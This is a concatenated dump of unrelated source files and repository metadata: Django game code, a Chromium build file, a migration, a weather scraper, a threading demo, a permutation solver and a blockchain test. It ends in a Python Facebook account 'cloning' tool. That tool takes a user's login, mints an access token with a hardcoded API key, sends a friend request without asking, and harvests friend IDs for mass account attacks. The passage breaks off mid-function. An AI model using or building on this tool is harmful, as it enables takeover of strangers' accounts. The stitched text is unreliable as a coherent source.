if game_round.round_number >= len(season.rounds.all()):
season.completed = True
season.current_round = None
season.winner = gameapp.season.controller.get_team_table(season, 1)[0]
else:
next_round = game_round.round_number + 1
season.current_round = season.rounds.get(round_number=next_round)
season.save()
return False # todos os matches resolvidos
def get_matches_for_serie(round, serie):
return round.matches.filter(serie=serie)
def create_rounds(season):
matches_serie_a = gameapp.match.controller.create_matches(season.teams.filter(serie=1))
matches_serie_b = gameapp.match.controller.create_matches(season.teams.filter(serie=2))
matches_serie_c = gameapp.match.controller.create_matches(season.teams.filter(serie=3))
matches_serie_d = gameapp.match.controller.create_matches(season.teams.filter(serie=4))
game_round = None
for match_count in range(len(matches_serie_a)):
if match_count % 4 == 0:
if game_round is not None:
game_round.save()
game_round = Round(round_number=((match_count / 4) + 1), \
resolved=False)
game_round.save()
season.rounds.add(game_round)
game_round.matches.add(matches_serie_a[match_count])
game_round.matches.add(matches_serie_b[match_count])
game_round.matches.add(matches_serie_c[match_count])
game_round.matches.add(matches_serie_d[match_count])
game_round.save()
season.current_round = season.rounds.get(round_number=1)
season.save()
|
[
"raphaelbaldi@gmail.com@cf4997be-b4d0-2e88-bcf9-847bdaf59e33"
] |
raphaelbaldi@gmail.com@cf4997be-b4d0-2e88-bcf9-847bdaf59e33
|
924ce17d10d664bfe831de2f8652c0305d50c24d
|
33546aee6429d5b8f19a02e14699b6ebb5b34af8
|
/src/ui/surface/surface.gyp
|
a6ad39b07e77af7c516496738acd933474cdbba8
|
[
"BSD-3-Clause"
] |
permissive
|
mYoda/CustomBrs
|
bdbf992c0db0bf2fd1821fa1fd0120ac77ffc011
|
493fc461eb7ea7321c51c6831fe737cfb21fdd3e
|
refs/heads/master
| 2022-11-22T09:11:37.873894
| 2022-11-10T10:02:49
| 2022-11-10T10:02:49
| 24,951,822
| 0
| 1
| null | 2022-11-02T14:39:34
| 2014-10-08T17:22:30
|
C++
|
UTF-8
|
Python
| false
| false
| 1,100
|
gyp
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'variables': {
'chromium_code': 1,
},
'target_defaults': {
'conditions': [
['use_x11 == 1', {
'include_dirs': [
'../../third_party/khronos',
],
}],
],
},
'targets': [
{
'target_name': 'surface',
'type': '<(component)',
'dependencies': [
'../../base/base.gyp:base',
'../../base/third_party/dynamic_annotations/dynamic_annotations.gyp:dynamic_annotations',
'../../skia/skia.gyp:skia',
'../base/ui_base.gyp:ui_base',
'../gfx/gfx.gyp:gfx_geometry',
'../gl/gl.gyp:gl',
],
'sources': [
'accelerated_surface_mac.cc',
'accelerated_surface_mac.h',
'surface_export.h',
'transport_dib.h',
'transport_dib.cc',
'transport_dib_posix.cc',
'transport_dib_win.cc',
],
'defines': [
'SURFACE_IMPLEMENTATION',
],
},
],
}
|
[
"nechayukanton@gmail.com"
] |
nechayukanton@gmail.com
|
7ba620607c2587cb5f225e039c698cae340a4015
|
3c0f8b3ff8e15d354a92ab060a9bda187f1eb4af
|
/blog/migrations/0004_blogcategory_parent.py
|
fcdf3d2bce1cdf390d1b68f1a2d3d0b5c1b6b873
|
[] |
no_license
|
TamannaArora/Blogging
|
cc9baedb0bfe1e6b19923fdcae749dbafd740d54
|
57467e4c5f311db45878a588e94eaac91ab160e6
|
refs/heads/master
| 2022-12-15T04:53:56.092112
| 2018-09-24T06:35:40
| 2018-09-24T06:35:40
| 149,570,576
| 0
| 0
| null | 2022-12-07T23:52:22
| 2018-09-20T07:38:17
|
Python
|
UTF-8
|
Python
| false
| false
| 694
|
py
|
# Generated by Django 2.0.8 on 2018-09-07 10:57
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('blog', '0003_blogpage_author'),
]
operations = [
migrations.AddField(
model_name='blogcategory',
name='parent',
field=models.ForeignKey(blank=True, help_text='Categories, unlike tags, can have a hierarchy. You might have a Jazz category, and under that have children categories for Bebop and Big Band. Totally optional.', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='children', to='blog.BlogCategory'),
),
]
|
[
"tamanna.arora@netsolutions.com"
] |
tamanna.arora@netsolutions.com
|
bb0dcab2d93ab44998895a25f23b7638074da429
|
32572cb805af797a3190311fdbe7b50c28f3e6ef
|
/reptilian.py
|
47087223257de45030d2387ef3c5bfbbfd9dd0f5
|
[] |
no_license
|
weiqifa0/python-weather
|
b629d10f9b8ab82bfe0cdaeddfb46b108caf32f3
|
b3eb06d67ad992a57d2b8ee91da30bb7868cc9b0
|
refs/heads/master
| 2020-03-29T01:02:36.175886
| 2018-09-19T00:34:47
| 2018-09-19T00:34:47
| 149,368,504
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 423
|
py
|
from getContent import *
from getData import *
from writeDate import *
if __name__ == '__main__':
url = 'http://www.weather.com.cn/weather/101210101.shtml'
html = getContent(url) # 调用获取网页信息
result = getData(html) # 解析网页信息,拿到需要的数据
writeData(result, 'E:/project/python/Reptilian/weather.csv') # 数据写入到 csv文档中
print('my frist python file')
|
[
"329410527@qq.comgit config --global user.name"
] |
329410527@qq.comgit config --global user.name
|
45a82527d6560beaeb597f6c84a2d895aa67a527
|
49d843353d464410420f98bfffced7b9ffcde351
|
/PycharmProjects/Stage 2/day18/thread_1.py
|
bdfda35db27ac1b46a1cb5f8cee0168d1e3fc7c5
|
[] |
no_license
|
davidlu2002/AID2002
|
a634232a4c23e6541f1b164167d6f0dcdd77d95e
|
4eb6854493aea5440b4736acda29d99047c7db81
|
refs/heads/master
| 2022-10-18T14:56:56.673308
| 2020-06-10T02:14:10
| 2020-06-10T02:14:10
| 270,518,044
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 665
|
py
|
"""
thread_1.py 线程使用1
"""
from threading import Thread
from time import sleep
import os
a = 1 # 主线程的变量
def fun():
for i in range(3):
print(os.getpid(),"运行程序1")
sleep(2)
print("程序1运行完毕")
global a
print("a =",a)
a = 10000 # 分支线程内改变主线程的变量
# 创建线程对象
t = Thread(target=fun)
t.start() # 启动线程
# 主线程代码与分支线程代码同时执行
for i in range(4):
print(os.getpid(),"运行程序2")
sleep(1)
print("程序2运行完毕")
t.join() # 回收线程
print("main a:",a) # 所有线程共用一块空间
|
[
"2568899732@qq.com"
] |
2568899732@qq.com
|
64dacea4bbd3545e9a02839b932ed4f059fae753
|
d2b4cbf47cdbdc74a74c348043aaf8bef9b56904
|
/crepes_bretonnes/blog/templatetags/blog_random.py
|
3fc1ab132d150b73e8f383cef7a4a01b60358d82
|
[] |
no_license
|
chadyred/breton-py
|
25fbe08a3180d72a942ceaf4b2b04991b8868a1f
|
06b61b98ca2d7160fd236852c490faf3536bb5f8
|
refs/heads/master
| 2021-01-12T17:28:31.320452
| 2017-05-29T06:45:13
| 2017-05-29T06:45:13
| 71,578,361
| 0
| 0
| null | 2017-05-26T08:03:13
| 2016-10-21T15:35:13
|
Python
|
UTF-8
|
Python
| false
| false
| 329
|
py
|
#-*- coding: utf-8 -*-
from __future__ import unicode_literals
from random import randint
from django import template
register = template.Library()
@register.simple_tag
def random(begin, end):
try:
return randint(int(begin), int(end))
except Exception as e:
raise e + "Deux arguments int sont nécessaire"
|
[
"fcellier@norsys.fr"
] |
fcellier@norsys.fr
|
002dc2a20200db290f59b8d827b0e30db0263dda
|
7f059f64638762a4af033553e10fe0707dacbbcc
|
/archive/python/backtracking/Permutation.py
|
5e1a1acae68632ca4dca1b31e355bf0a306c13d1
|
[
"MIT"
] |
permissive
|
sureleo/leetcode
|
df9099d895faaa7f14aa5c0309cbd603ccf22e2f
|
190b81817c7e7c564f5f1299b8c5638d10d2a511
|
refs/heads/master
| 2021-01-10T18:26:24.372568
| 2019-12-24T17:45:40
| 2019-12-24T17:45:40
| 28,789,872
| 1
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 657
|
py
|
class Solution:
# @param num, a list of integer
# @return a list of lists of integers
def __init__(self):
self.num = []
self.result = []
def permute(self, num):
self.num = num
self.dfs([], self.num)
return self.result
def dfs(self, valuelist, num_list):
if len(valuelist) == len(self.num):
self.result.append(valuelist)
return
for i in xrange(len(num_list)):
self.dfs(valuelist+[num_list[i]], num_list[0:i] + num_list[i+1:])
if __name__ == "__main__":
solution = Solution()
print solution.permute([1, 2, 3])
|
[
"surezeroleo@gmail.com"
] |
surezeroleo@gmail.com
|
f232197bf4bdd9302fbe97431575ee55b7c2c3d1
|
89dbaf6b4e7e79441a1bcfdce7b645179209d2ea
|
/qa/rpc-tests/mempool_resurrect_test.py
|
a0096eaa1bc84f96b32d6075f7db303b255cc123
|
[
"MIT"
] |
permissive
|
dzcoin/DzCoinMiningAlgorithm
|
cd7f7af778f350442e3b1154ae34ec1916a46b2a
|
b0294cf5ac893fe907b08105f1aa826c3da464cf
|
refs/heads/master
| 2021-01-09T20:57:23.439272
| 2016-08-14T17:33:38
| 2016-08-14T17:33:38
| 65,678,189
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,414
|
py
|
#!/usr/bin/env python2
# copyright (c) 2014 the dzcoin core developers
# distributed under the mit software license, see the accompanying
# file copying or http://www.opensource.org/licenses/mit-license.php.
#
# test resurrection of mined transactions when
# the blockchain is re-organized.
#
from test_framework.test_framework import dzcointestframework
from test_framework.util import *
import os
import shutil
# create one-input, one-output, no-fee transaction:
class mempoolcoinbasetest(dzcointestframework):
def setup_network(self):
# just need one node for this test
args = ["-checkmempool", "-debug=mempool"]
self.nodes = []
self.nodes.append(start_node(0, self.options.tmpdir, args))
self.is_network_split = false
def create_tx(self, from_txid, to_address, amount):
inputs = [{ "txid" : from_txid, "vout" : 0}]
outputs = { to_address : amount }
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
signresult = self.nodes[0].signrawtransaction(rawtx)
assert_equal(signresult["complete"], true)
return signresult["hex"]
def run_test(self):
node0_address = self.nodes[0].getnewaddress()
# spend block 1/2/3's coinbase transactions
# mine a block.
# create three more transactions, spending the spends
# mine another block.
# ... make sure all the transactions are confirmed
# invalidate both blocks
# ... make sure all the transactions are put back in the mempool
# mine a new block
# ... make sure all the transactions are confirmed again.
b = [ self.nodes[0].getblockhash(n) for n in range(1, 4) ]
coinbase_txids = [ self.nodes[0].getblock(h)['tx'][0] for h in b ]
spends1_raw = [ self.create_tx(txid, node0_address, 50) for txid in coinbase_txids ]
spends1_id = [ self.nodes[0].sendrawtransaction(tx) for tx in spends1_raw ]
blocks = []
blocks.extend(self.nodes[0].generate(1))
spends2_raw = [ self.create_tx(txid, node0_address, 49.99) for txid in spends1_id ]
spends2_id = [ self.nodes[0].sendrawtransaction(tx) for tx in spends2_raw ]
blocks.extend(self.nodes[0].generate(1))
# mempool should be empty, all txns confirmed
assert_equal(set(self.nodes[0].getrawmempool()), set())
for txid in spends1_id+spends2_id:
tx = self.nodes[0].gettransaction(txid)
assert(tx["confirmations"] > 0)
# use invalidateblock to re-org back; all transactions should
# end up unconfirmed and back in the mempool
for node in self.nodes:
node.invalidateblock(blocks[0])
# mempool should be empty, all txns confirmed
assert_equal(set(self.nodes[0].getrawmempool()), set(spends1_id+spends2_id))
for txid in spends1_id+spends2_id:
tx = self.nodes[0].gettransaction(txid)
assert(tx["confirmations"] == 0)
# generate another block, they should all get mined
self.nodes[0].generate(1)
# mempool should be empty, all txns confirmed
assert_equal(set(self.nodes[0].getrawmempool()), set())
for txid in spends1_id+spends2_id:
tx = self.nodes[0].gettransaction(txid)
assert(tx["confirmations"] > 0)
if __name__ == '__main__':
mempoolcoinbasetest().main()
|
[
"dzgrouphelp@foxmail.com"
] |
dzgrouphelp@foxmail.com
|
cf841b76b1eb5e60fcea019a4d0aafa4043d1dfd
|
d778a0da8ab7157dc76d42a709367f37161fa565
|
/bookmarks/account/forms.py
|
35950adad9ed652ab900fc57d45ee98ce9f5d329
|
[] |
no_license
|
AmazingSkyLine/Django-By-Example-Project
|
86780b8a6e7e86ac0d881993dc7a6baae1b5a9b4
|
689f300169fba70da56e44ce4e8468df35f2f7a9
|
refs/heads/master
| 2021-05-12T09:52:06.624892
| 2018-02-28T16:24:26
| 2018-02-28T16:24:26
| 117,336,269
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,050
|
py
|
from django import forms
from django.contrib.auth.models import User
from .models import Profile
# 登录表单
class LoginForm(forms.Form):
username = forms.CharField(label="用户名")
password = forms.CharField(label="密码", widget=forms.PasswordInput)
# 注册表单
class UserRegistrationForm(forms.ModelForm):
password = forms.CharField(label="输入密码", widget=forms.PasswordInput)
password2 = forms.CharField(label="再次输入密码", widget=forms.PasswordInput)
class Meta:
model = User
fields = ('username', 'email', 'first_name')
def clean_password2(self):
cd = self.cleaned_data # 表单数据
if cd['password'] != cd['password2']:
raise forms.ValidationError('密码不匹配!')
return cd['password2']
class UserEditForm(forms.ModelForm):
class Meta:
model = User
fields = ('first_name', 'email')
class ProfileEditForm(forms.ModelForm):
class Meta:
model = Profile
fields = ('date_of_birth', 'photo')
|
[
"15002963138@163.com"
] |
15002963138@163.com
|
f30cc6d0be2770d0b1aa2a10eecb5907a6985c08
|
638fabe27947b1b9bfc8b357d94cb7faf82c1f8d
|
/harshudubey.py
|
966bd50a563dddaf114c69f7d26b1ee484402e57
|
[] |
no_license
|
harshudubey/harahu
|
494ad353d608311812ec967a42296bee330141ff
|
a5567a0bad7868fd87f1eda4d45b78bbd7b3f2b4
|
refs/heads/master
| 2022-04-28T08:31:22.053346
| 2020-04-19T00:09:09
| 2020-04-19T00:09:09
| 256,864,102
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 25,031
|
py
|
#!/usr/bin/python2
#coding=utf-8
#The Credit For This Code Goes To lovehacker
#If You Wanna Take Credits For This Code, Please Look Yourself Again...
#Reserved2020
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "\x1b[1;91mExit"
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.07)
#Dev:harshu_dubey
##### LOGO #####
logo = """
\033[1;91m:•◈ ░█ ▄▀█ █▀█ █▀ █░█ █░█ ▀▄▀:•◈•
\033[1;91m:•◈•█▀█ █▀█ █▀▄ ▄█ █▀█ █▄█ █░█:•◈•
\033[1;91m:•◈•█▀█ █░█ █▀▀ █░█ █ █▄▀ ▄▀█:•◈•
\033[1;91m:•◈•█▀▄ █▄█ █▄▄ █▀█ █ █░█ █▀█:•◈•
\033[1;91m:•◈•
\033[1;91m:•◈•█╗░░██╗░█████╗░██████╗░░██████╗██╗░░██╗██╗░░░██╗:•◈•
\033[1;91m:•◈•██║░░██║██╔══██╗██╔══██╗██╔════╝██║░░██║██║░░░██║:•◈•
\033[1;91m:•◈•███████║███████║██████╔╝╚█████╗░███████║██║░░░██║:•◈•
\033[1;91m:•◈•██╔══██║██╔══██║██╔══██╗░╚═══██╗██╔══██║██║░░░██║:•◈•
\033[1;91m:•◈•██║░░██║██║░░██║██║░░██║██████╔╝██║░░██║╚██████╔╝:•◈•
\033[1;91m:•◈•╚═╝░░╚═╝╚═╝░░╚═╝╚═╝░░╚═╝╚═════╝░╚═╝░░╚═╝░╚═════╝░:•◈•
\033[1;91m:•◈•
\033[1;
\033[1;91m:•◈•
\033[1;94m:•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬ •◈•\033[1;91mKali.linux\033[1;94m•◈•▬ ▬ ▬ ▬ ▬ •◈•
\033[1;91m:•◈•
\033[1;91m:•◈•██████╗░██╗░░░██╗██████╗░███████╗██╗░░░██╗
\033[1;91m:•◈•██╔══██╗██║░░░██║██╔══██╗██╔════╝╚██╗░██╔╝word liest
\033[1;91m:•◈•██║░░██║██║░░░██║██████╦╝█████╗░░░╚████╔╝░
\033[1;91m:•◈•██║░░██║██║░░░██║██╔══██╗██╔══╝░░░░╚██╔╝░░
\033[1;91m:•◈•╔╝╚██████╔╝██████╦╝███████╗░░░██║░░░
\033[1;91m:•◈•╚═════╝░░╚═════╝░╚═════╝░╚══════╝░░░╚═╝░░░
\033[1;91m:•◈•░░░░░██╗██╗
\033[1;91m:•◈•░░░░░██║██║
\033[1;91m:•◈•░░░░░██║██║
\033[1;91m:•◈•██╗░░██║██║
\033[1;91m:•◈•╚█████╔╝██║
\033[1;91m:•◈•░╚════╝░╚═╝
\033[1;91m:•◈•
\033[1;91m:•◈•
\033[1;91m:•◈•
\033[1;91m:•◈•
\033[1;94m:•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬ •◈•\033[1;91mKali.linux\033[1;94m•◈•▬ ▬•◈•"""
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\x1b[1;93mPlease Wait \x1b[1;93m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
print """
\033[1;94m•◈••◈••◈•\033[1;94m◈••◈••◈••◈••◈•◈••◈••◈••◈••◈\033[1;94m•◈••◈••◈•
\033[1;94m•◈••◈••◈•\033[1;95m. █░▒█ ░█▀▀█ ▒█▀▀█ ▒█▀▀▀█ ▒█░▒█ ▒█░▒█ \033[1;94m•◈••◈••◈•\033[1;95m.
\033[1;94m•◈••◈••◈•\033[1;95m. ▒█▀▀█ ▒█▄▄█ ▒█▄▄▀ ░▀▀▀▄▄ ▒█▀▀█ ▒█░▒█ \033[1;94m•◈••◈••◈•\033[1;95m.
\033[1;94m•◈••◈••◈•\033[1;95m. ▒█░▒█ ▒█░▒█ ▒█░▒█ ▒█▄▄▄█ ▒█░▒█ ░▀▄▄▀ \033[1;94m•◈••◈••◈•\033[1;95m.
\033[1;94m•◈••◈••◈•\033[1;95m. ▀▄▒▄▀ █▀▀█ \033[1;94m•◈••◈••◈•\033[1;95m.
\033[1;94m•◈••◈••◈•\033[1;95m.
\033[1;94m•◈••◈••◈•\033[1;95m. ░▒█░░ ░░▀▄ \033[1;94m•◈••◈••◈•\033[1;95m.
\033[1;94m•◈••◈••◈•\033[1;95m. ▄▀▒▀▄ █▄▄█ \033[1;94m•◈••◈••◈•\033[1;95m.
\033[1;94m•◈••◈••◈•\033[1;95m.▒█▀▀█ ▒█░▒█ ▒█▀▀█ ▒█░▒█ ▀█▀ ▒█░▄▀ ░█▀▀█ \033[1;94m•◈••◈••◈•\033[1;95m.
\033[1;94m•◈••◈••◈•\033[1;95m.▒█▄▄▀ ▒█░▒█ ▒█░░░ ▒█▀▀█ ▒█░ ▒█▀▄░ ▒█▄▄█ \033[1;94m•◈••◈••◈•\033[1;95m.
\033[1;94m•◈••◈••◈•\033[1;95m.
\033[1;94m•◈••◈••◈•\033[1;95m.▒█░▒█ ░▀▄▄▀ ▒█▄▄█ ▒█░▒█ ▄█▄ ▒█░▒█ ▒█░▒█ \033[1;94m•◈••◈••◈•\033[1;95m.
\
\033[1;94m•◈••◈••◈•\033[1;95m. █╗███╗░░██╗██████╗░██╗░█████╗░███╗░░██╗\033[1;94m•◈••◈••◈•\033[1;95m.
\033[1;94m•◈••◈••◈•\033[1;95m.██║████╗░██║██╔══██╗██║██╔══██╗████╗░██║\033[1;94m•◈••◈••◈•\033[1;95m.
\033[1;94m•◈••◈••◈•\033[1;95m.██║██╔██╗██║██║░░██║██║███████║██╔██╗██║\033[1;94m•◈••◈••◈•\033[1;95m.
\033[1;94m•◈••◈••◈•\033[1;95m.██║██║╚████║██║░░██║██║██╔══██║██║╚████║\033[1;94m•◈••◈••◈•\033[1;95m.
\033[1;94m•◈••◈••◈•\033[1;95m.██║██║░╚███║██████╔╝██║██║░░██║██║░╚███║\033[1;94m•◈••◈••◈•\033[1;95m.
\033[1;94m•◈••◈••◈•\033[1;95m.╚═╝╚═╝░░╚══╝╚═════╝░╚═╝╚═╝░░╚═╝╚═╝░░╚══╝\033[1;94m•◈••◈••◈•\033[1;95m.
\033[1;94m•◈••◈••◈•\033[1;95m . \033[1;94m•◈••◈••◈•
\033[1;94m•◈••◈••◈•\033[1;95m \033[1;94m•◈••◈••◈•
\033[1;94m•◈••◈••◈•\033[1;95m. \033[1;94m•◈••◈••◈•
\033[1;94m•◈••◈••◈••◈•\033[1;94m••◈••◈••◈••◈••◈••◈••◈••◈•\033[1;94m•◈••◈••◈••◈•
\033[1;91m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•\033[1;94mKalilinux\033[1;91m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•"""
jalan('\033[1;95m▬10%')
jalan("\033[1;95m▬▬20%")
jalan('\033[1;95m▬▬▬30%')
jalan('\033[1;95m▬▬▬▬40%')
jalan("\033[1;95m▬▬▬▬▬50%")
jalan("\033[1;95m▬▬▬▬▬▬60% \033[1;91mAll Country ID Clone")
jalan('\033[1;95m▬▬▬▬▬▬▬70%')
jalan('\033[1;95m▬▬▬▬▬▬▬▬80%')
jalan('\033[1;95m▬▬▬▬▬▬▬▬▬90%')
jalan('\033[1;95m▬▬▬▬▬▬▬▬▬100%')
print "\033[1;91m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•\033[1;94mkalilinux\033[1;91m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•"
CorrectUsername = "harshu"
CorrectPassword = "ruchika"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;91m📋 \x1b[1;91mTool Username \x1b[1;91m»» \x1b[1;92m")
if (username == CorrectUsername):
password = raw_input("\033[1;91m🗝 \x1b[1;91mTool Password \x1b[1;91m»» \x1b[1;92m")
if (password == CorrectPassword):
print "Logged in successfully as " + username #Dev:harshu_ruchika
time.sleep(2)
loop = 'false'
else:
print "\033[1;93mWrong Password"
os.system('xdg-open https://www.youtube.com/channel/UC3S835IJhJvZiTL04O0AHBg')
print "\033[1;94mWrong Username"
os.system('xdg-open https://www.youtube.com/channel/UC3S835IJhJvZiTL04O0AHBg')
def login():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
print logo
jalan(' \033[1;91mWarning: \033[1;95mDo Not Use Your Personal Account' )
jalan(' \033[1;91mWarning: \033[1;95mUse a New Account To Login' )
jalan(' \033[1;91mWarning: \033[1;95mTermux Old Version install 0.63✅' )
print "\033[1;94m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬ •◈•\033[1;91mKali.linux\033[1;94m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•"
print(' \033[1;94m▬\x1b[1;94m✔✔✔✔✔✔✔LOGIN WITH FACEBOOK✔✔✔✔✔✔✔\x1b[1;94m▬' )
print(' ' )
id = raw_input('\033[1;91m[+] \x1b[1;94mID/Email\x1b[1;95m: \x1b[1;93m')
pwd = raw_input('\033[1;91m[+] \x1b[1;91mPassword\x1b[1;96m: \x1b[1;93m')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\x1b[1;96mThere is no internet connection"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\x1b[1;92mLogin Successful.•◈•..'
os.system('xdg-open https://m.youtube.com/channel/UCRrRgcJjsnNm5Bi5ZenRGnw')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
menu()
except requests.exceptions.ConnectionError:
print"\n\x1b[1;91mThere is no internet connection"
keluar()
if 'checkpoint' in url:
print("\n\x1b[1;93mYour Account is on Checkpoint")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\x1b[1;94mPassword/Email is wrong")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
print"\x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print"\033[1;91mYour Account is on Checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\x1b[1;92mThere is no internet connection"
keluar()
os.system("clear") #Dev:love_hacker
print logo
print " \033[1;92m«----•◈••◈•----\033[1;93mLogged in User Info\033[1;92m----•◈••◈•-----»"
print " \033[1;91m Name\033[1;93m:\033[1;92m"+nama+"\033[1;93m "
print " \033[1;91m ID\033[1;93m:\033[1;92m"+id+"\x1b[1;93m "
print "\033[1;91m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬ •◈•\033[1;93mKali.linux\033[1;91m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬ •◈•"
print "\033[1;97m-•◈•-\033[1;92m> \033[1;92m1.\x1b[1;92mStart Cloning..."
print "\033[1;97m-•◈•-\033[1;91m> \033[1;91m0.\033[1;91mExit "
pilih()
def pilih():
unikers = raw_input("\n\033[1;91mChoose an Option>>> \033[1;97m")
if unikers =="":
print "\x1b[1;91mFill in correctly"
pilih()
elif unikers =="1":
super()
elif unikers =="0":
jalan('Token Removed')
os.system('rm -rf login.txt')
keluar()
else:
print "\x1b[1;91mFill in correctly"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print "\033[1;92m-•◈•-\033[1;91m> \033[1;92m1.\x1b[1;91mClone From Friend List."
print "\033[1;92m-•◈•-\033[1;91m> \033[1;92m2.\x1b[1;91mClone Friend List Public ID."
print "\033[1;92m-•◈•-\033[1;91m> \033[1;92m0.\033[1;92mBack"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;91mChoose an Option>>> \033[1;97m")
if peak =="":
print "\x1b[1;91mFill in correctly"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
print "\033[1;91m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•\033[1;93mKali.linux\033[1;91m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬ •◈•"
jalan('\033[1;93mGetting IDs \033[1;93m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('clear')
print logo
idt = raw_input("\033[1;92m[•◈•] \033[1;92mEnter ID\033[1;93m: \033[1;95m")
print "\033[1;91m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•\033[1;93mKali.linux\033[1;91m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•"
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;93mName\033[1;93m:\033[1;97m "+op["name"]
except KeyError:
print"\x1b[1;92mID Not Found!"
raw_input("\n\033[1;92m[\033[1;91mBack\033[1;92m]")
super()
print"\033[1;93mGetting IDs\033[1;92m..."
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="0":
menu()
else:
print "\x1b[1;91mFill in correctly"
pilih_super()
print "\033[1;91mTotal IDs\033[1;93m: \033[1;94m"+str(len(id))
jalan('\033[1;92mPlease Wait\033[1;93m...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;91mCloning\033[1;93m"+o),;sys.stdout.flush();time.sleep(1)
print "\n\033[1;92m«--•◈••◈•---\x1b[1;93m•◈•Stop Process Press CTRL+Z•◈•\033[1;92m---•◈••◈•-»"
print "\033[1;91m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•\033[1;93mKali.linux\033[1;91m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬ •◈•"
jalan(' \033[1;93m🔎🔎🔎🔎🔎🔎🔎\033[1;94mCloning Start..\033[1;93m🔍🔍🔍🔍🔍🔍🔍 ')
print "\033[1;91m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•\033[1;93mKali.linux\033[1;91m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬ •◈•"
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
